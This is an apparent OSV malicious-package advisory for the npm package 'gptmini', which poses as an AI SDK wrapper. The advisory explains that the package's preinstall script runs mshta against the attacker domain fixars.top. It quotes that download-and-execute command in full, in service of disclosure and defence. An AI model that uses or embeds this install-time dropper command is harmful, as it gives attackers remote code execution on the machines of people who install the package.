OSV ID
MAL-2026-6537
Ecosystem
npm
Summary
On npm install , the package's preinstall lifecycle script (preinstall.js, declared via scripts.preinstall "node preinstall.js") shells out with exec('cmd /c "mshta http://fixars.top"') . This causes Windows to fetch and execute an HTML Application from the remote host fixars.top over plain HTTP at install time with no user interaction, yielding remote code execution on the installer's machine. The package presents itself as a Node.js wrapper for a GPT/OpenAI-style SDK (name gptmini , baseUrl https://api.openllm.ai/v1), with empty author metadata — an AI-SDK-shaped lure paired with an install-time dropper to an attacker-controlled domain unrelated to any documented publisher.
Source: amazon-inspector (cb05abb3d36b111df4aa8fe044cbf05a431a0778e90d022e1621494c1506a171)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.